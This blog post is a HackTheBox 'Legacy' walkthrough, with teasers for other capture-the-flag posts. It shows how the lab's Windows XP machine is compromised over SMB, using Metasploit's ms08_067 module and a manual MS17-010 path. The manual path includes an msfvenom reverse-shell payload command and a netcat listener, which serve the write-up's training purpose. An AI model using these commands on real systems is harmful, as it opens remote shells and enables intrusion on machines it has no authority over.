Skip to main content

HTB LEGACY WALK-THROUGH WRITE-UP (WITH AND WITHOUT METASPLOIT)


HackTheBox is an excellent platform for various pentesters to increase their testing skills  and knowledge.
Machine Level -Easy
Machine Name -Legacy
Machine OS -Windows
Machine IP -10.10.10.4
Tools:
Nmap -Nmap is a fantastic tools for scanning the open ports, services and OS detection. You can use other tools other than nmap (which ever you are more comfortable with ) like masscan, SPARTA etc to scan for open ports.
Metasploit -One of the most common and widely used tool by pentesters to launch exploits, it is maintained by Rapid 7 . Many books are available to understand the features of this tool.
We will be performing the attack by two methodology (using and without using metasploit).
****************************************************************************************
Methodology 1 (using Metasploit)
Scanning the machine is the first step(i.e. Enumeration). We use the following nmap command,
sudo nmap -T4 -p- -A 10.10.10.4
(we can run the command with sudo privileges if error occurs regarding privileges.)
The command  scans for all ports(-p-) with threads speed 4 (-T4) and also gives you version details  (-A).
We get the result as in the fig. We can see for various open ports. Down below in Host script result section we can see :
We see that smb is present, that's very juicy. Smb is most vulnerable and easy to exploit. We can see that victim machine is Windows XP. Since its a smb vulnerability metasploit can be used to launch exploit.
So, time to fire up metasploit.
Type msfconsole in terminal and search for smb_version.
Select the module 0 by using command as shown, then use the command "options" to see various options available.
Now its time to set RHOSTS to our victim IP address, and run the exploit as shown
Here's the result for the version detection,
We can see that it is a Windows XP SP2+ .
Search for smb Windows XP SP2+ exploit on google(generally Rapid7 has msf modules).
Exploits Link:
https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
Scroll down to find the exploit in the module and then copy the exploit,
Use the exploit as shown and see if you get a session.
Hooray! We got a session .
Now you can move around to see for user and root flags.
Here's a example :
Type help to see for various operations you can perform,
Navigate through the files,
Get into files,
To get user flag ,
Return back using cd..\..\
To get root flag, use same method
So that's it for this machines .We were able to get both the root flag and user flag.
****************************************************************************************
Now we can also do this task without using Metasploit.
Methodology 2(without using Metasploit)
First step is same as earlier . Scan for open ports to find that there is ms17-010 vulnerability.
Now use the locate *nse | grep sum-vuln command to locate nmap scripts that re related to smb-vuln.
You can see for various MS17-010 exploit using the command searchsploit MS17-010
Since we are avoiding the use of metasploit we need to create a payload using msfvenom and save it in executable format (i.e. blue.exe)
The command is :
msfvenom -p windows/shell_reverse_tcp LHOST=X.X.X.X LPORT=445 -f exe > blue.exe
where you need to enter your IP address in place of X.X.X.X in LHOST. Hit enter to save the payload. Here you set payload windows/shell_reverse_tcp with listening port 445.
Now its time to execute a python script and along with it pass the victim's IP address and the payload we just created. To execute this you need  the required files in the same location where you have created the payload. Files are :
1)mysmb.py
2)send_and_execute.py
If some of the modules are missing like impacket then, then install them using the command,
pip install impacket
Back to terminal. Now create a listening port using command
sudo nc -nvlp 443
Now launch the python script,(we are sending a python file named send_and_execute.py to the victim machine along with  blue.exe (payload to be executed) which contains our IP and listening port),
Lets see the listening port for results,
Hooray! We entered the victim system, now you may perform all the operation that you intend to do.
Here's a example:
Get user flag, from the john directory,
Get root flag from the Administration directory,
That's all for this method .
We were successful in gaining access to user and root flag through both the methods.
Metasploit is pretty easy to execute, but sometimes when you are restricted for not using metasploit you can follow the other method.

Thanks!

Comments

Post a Comment

Popular posts from this blog

VULNHUB INFOSEC PREP : OSCP

Welcome to the walkthrough of InfoSec Prep: OSCP walkthrough. It is a beginner-level boot2root machine and it can be downloaded from  here . I cracked this machine literally 5 minutes after it booted properly. So you can consider this machine the easiest.  Hint: Nmap Finding secret.txt and decoding it. Login via ssh. Privilege escalation to root via SUID binary.  Boot up the machine and it should show the IP address. We start off by pinging the box to verify that the box is up and running and we can reach out to it. Command: ping <IP> Then we can run Nmap scan to look for open ports and services running on the box. We will use -sC for running default scripts, -sV for Version/Service info and -T4 for faster execution, and -o for saving the result on a file named nmap The command is: sudo nmap -sC -sV -T4 <IP> -o filename Looking at the scan results, port 22 is open and running ssh, and port 80 is open, and it's running Apache. We can also see a directory named ...
Post a Comment
Read more

Beginners Code Review Part 1

  Image credits to  Leobit This is a walkthrough of an exercise created by  PentesterLab  as a free course for learning beginner-friendly source code review. The link to the source code is here . Either clone it or download it as a zip locally. As instructed in the exercise we won't run the run, just read through the source code and look for possible weaknesses that we can leverage into vulnerabilities. LIST OF WEAKNESSES You can find below the list of issues present in the application: Hardcoded credentials or secrets Information leak Missing security flags Weak password hashing mechanism Cross-Site Scripting No CSRF protection Directory Listing Crypto issue Signature bypass Authentication bypass Authorization bypass Remote Code Execution Hand-On Findings and Objectives * Hardcoded credentials or secrets      ...
Post a Comment
Read more

KIOPTRIX LEVEL 1 WALKTHROUGH WITH AND WITHOUT METASPLOIT

Kioptrix Level 1 is a beginner level CTF challenge. You can download this virtual machine from here .  Details of Kioptrix : Size----186 MB OS---Linux Note: In virtual box, set up a Bridged network (virtual box -> preferences -> network) in networking, put both your Kali and Kioptrix to Bridged network. Fire-up both the machines(Kali and Kioptrix Level 1) Kioptrix will ask for the logins which we don't know at the moment. This also means we can't find IP of the Kioptrix directly from the Kioptrix machine itself. Leave the Kioptrix machine as it is and switch to Kali. First we need to find the IP address of the Kioptrix machine. We will use the tool netdiscover that comes pre-installed in Kali Linux to identify the IP address. Command   sudo netdiscover -i eth0 Wait  for scan results. 192.168.233.130 seems to be the IP of the Kioptrix machine. Let's scan this IP address using the tool Nmap (scan will also verify that its the IP of Kioptrix machine) Command  su...
1 comment
Read more